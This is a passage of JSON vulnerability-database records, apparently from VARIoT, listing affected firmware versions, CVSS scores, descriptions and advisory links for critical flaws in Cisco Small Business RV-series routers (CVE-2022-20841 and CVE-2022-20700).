                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2022-20841",
                  trust: 1.8,
                  value: "CRITICAL",
               },
               {
                  author: "ykramarz@cisco.com",
                  id: "CVE-2022-20841",
                  trust: 1,
                  value: "CRITICAL",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202208-2169",
                  trust: 0.6,
                  value: "CRITICAL",
               },
            ],
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-017111",
         },
         {
            db: "NVD",
            id: "CVE-2022-20841",
         },
         {
            db: "NVD",
            id: "CVE-2022-20841",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202208-2169",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. RV160 VPN router firmware, RV160W Wireless-AC VPN router firmware, RV260 VPN Multiple Cisco Systems products, including router firmware, contain vulnerabilities related to input validation.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. \nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. \nThis advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20841",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-017111",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20841",
         },
      ],
      trust: 1.71,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2022-20841",
            trust: 3.3,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-017111",
            trust: 0.8,
         },
         {
            db: "AUSCERT",
            id: "ESB-2022.3837",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202208-2169",
            trust: 0.6,
         },
         {
            db: "VULMON",
            id: "CVE-2022-20841",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULMON",
            id: "CVE-2022-20841",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-017111",
         },
         {
            db: "NVD",
            id: "CVE-2022-20841",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202208-2169",
         },
      ],
   },
   id: "VAR-202208-0323",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VARIoT devices database",
            id: null,
         },
      ],
      trust: 0.18174963,
   },
   last_update_date: "2023-12-18T13:27:08.869000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "cisco-sa-sb-mult-vuln-CbVp4SUR",
            trust: 0.8,
            url: "https://sec.cloudapps.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sb-mult-vuln-cbvp4sur",
         },
         {
            title: "Cisco Small Business RV Series Routers Enter the fix for the verification error vulnerability",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=204364",
         },
         {
            title: "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            trust: 0.1,
            url: "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-sb-mult-vuln-cbvp4sur",
         },
         {
            title: "The Register",
            trust: 0.1,
            url: "https://www.theregister.co.uk/2022/08/05/cisco_smb_routers_critical_flaws/",
         },
      ],
      sources: [
         {
            db: "VULMON",
            id: "CVE-2022-20841",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-017111",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202208-2169",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-20",
            trust: 1,
         },
         {
            problemtype: "Inappropriate input confirmation (CWE-20) [NVD evaluation ]",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-017111",
         },
         {
            db: "NVD",
            id: "CVE-2022-20841",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sb-mult-vuln-cbvp4sur",
         },
         {
            trust: 0.8,
            url: "https://nvd.nist.gov/vuln/detail/cve-2022-20841",
         },
         {
            trust: 0.6,
            url: "https://www.auscert.org.au/bulletins/esb-2022.3837",
         },
         {
            trust: 0.6,
            url: "https://cxsecurity.com/cveshow/cve-2022-20841/",
         },
         {
            trust: 0.1,
            url: "https://www.theregister.co.uk/2022/08/05/cisco_smb_routers_critical_flaws/",
         },
      ],
      sources: [
         {
            db: "VULMON",
            id: "CVE-2022-20841",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-017111",
         },
         {
            db: "NVD",
            id: "CVE-2022-20841",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202208-2169",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULMON",
            id: "CVE-2022-20841",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-017111",
         },
         {
            db: "NVD",
            id: "CVE-2022-20841",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202208-2169",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2023-10-11T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2022-017111",
         },
         {
            date: "2022-08-10T08:15:07.317000",
            db: "NVD",
            id: "CVE-2022-20841",
         },
         {
            date: "2022-08-04T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202208-2169",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2023-10-11T05:30:00",
            db: "JVNDB",
            id: "JVNDB-2022-017111",
         },
         {
            date: "2023-11-07T03:43:06.027000",
            db: "NVD",
            id: "CVE-2022-20841",
         },
         {
            date: "2022-08-16T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202208-2169",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202208-2169",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Input validation vulnerability in multiple Cisco Systems products",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-017111",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "input validation error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202208-2169",
         },
      ],
      trust: 0.6,
   },
}

var-202202-0893
Vulnerability from variot

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0893",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "rv340w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv340",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv345p",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv260p",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv345",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv260",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv260w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv260 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260p vpn router with poe",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345p dual wan gigabit poe vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340w dual wan gigabit wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-004940",
         },
         {
            db: "NVD",
            id: "CVE-2022-20700",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20700",
         },
      ],
   },
   cve: "CVE-2022-20700",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 10,
                  confidentialityImpact: "COMPLETE",
                  exploitabilityScore: 10,
                  impactScore: 10,
                  integrityImpact: "COMPLETE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 10,
                  confidentialityImpact: "Complete",
                  exploitabilityScore: null,
                  id: "CVE-2022-20700",
                  impactScore: null,
                  integrityImpact: "Complete",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.9,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 9.8,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 3.9,
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "ykramarz@cisco.com",
                  availabilityImpact: "HIGH",
                  baseScore: 10,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 3.9,
                  impactScore: 6,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 9.8,
                  baseSeverity: "Critical",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "CVE-2022-20700",
                  impactScore: null,
                  integrityImpact: "High",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2022-20700",
                  trust: 1.8,
                  value: "CRITICAL",
               },
               {
                  author: "ykramarz@cisco.com",
                  id: "CVE-2022-20700",
                  trust: 1,
                  value: "CRITICAL",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202202-176",
                  trust: 0.6,
                  value: "CRITICAL",
               },
               {
                  author: "VULMON",
                  id: "CVE-2022-20700",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULMON",
            id: "CVE-2022-20700",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004940",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-176",
         },
         {
            db: "NVD",
            id: "CVE-2022-20700",
         },
         {
            db: "NVD",
            id: "CVE-2022-20700",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20700",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004940",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20700",
         },
      ],
      trust: 1.71,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2022-20700",
            trust: 3.3,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004940",
            trust: 0.8,
         },
         {
            db: "CS-HELP",
            id: "SB2022020302",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-176",
            trust: 0.6,
         },
         {
            db: "VULMON",
            id: "CVE-2022-20700",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULMON",
            id: "CVE-2022-20700",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004940",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-176",
         },
         {
            db: "NVD",
            id: "CVE-2022-20700",
         },
      ],
   },
   id: "VAR-202202-0893",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VARIoT devices database",
            id: null,
         },
      ],
      trust: 0.18174963,
   },
   last_update_date: "2024-01-18T22:56:12.725000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "cisco-sa-smb-mult-vuln-KA9PK6D",
            trust: 0.8,
            url: "https://sec.cloudapps.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "Cisco Small Business Buffer error vulnerability fix",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=182686",
         },
         {
            title: "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            trust: 0.1,
            url: "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "Known Exploited Vulnerabilities Detector",
            trust: 0.1,
            url: "https://github.com/ostorlab/kev ",
         },
         {
            title: "CVE-2022-XXXX",
            trust: 0.1,
            url: "https://github.com/alphabugx/cve-2022-23305 ",
         },
         {
            title: "CVE-2022-XXXX",
            trust: 0.1,
            url: "https://github.com/alphabugx/cve-2022-rce ",
         },
         {
            title: "Threatpost",
            trust: 0.1,
            url: "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/",
         },
      ],
      sources: [
         {
            db: "VULMON",
            id: "CVE-2022-20700",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004940",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-176",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-787",
            trust: 1,
         },
         {
            problemtype: "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-004940",
         },
         {
            db: "NVD",
            id: "CVE-2022-20700",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.8,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            trust: 0.8,
            url: "https://nvd.nist.gov/vuln/detail/cve-2022-20700",
         },
         {
            trust: 0.6,
            url: "https://www.cybersecurity-help.cz/vdb/sb2022020302",
         },
         {
            trust: 0.1,
            url: "https://cwe.mitre.org/data/definitions/787.html",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov",
         },
         {
            trust: 0.1,
            url: "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/",
         },
      ],
      sources: [
         {
            db: "VULMON",
            id: "CVE-2022-20700",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004940",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-176",
         },
         {
            db: "NVD",
            id: "CVE-2022-20700",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULMON",
            id: "CVE-2022-20700",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004940",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-176",
         },
         {
            db: "NVD",
            id: "CVE-2022-20700",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2022-02-10T00:00:00",
            db: "VULMON",
            id: "CVE-2022-20700",
         },
         {
            date: "2023-05-11T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2022-004940",
         },
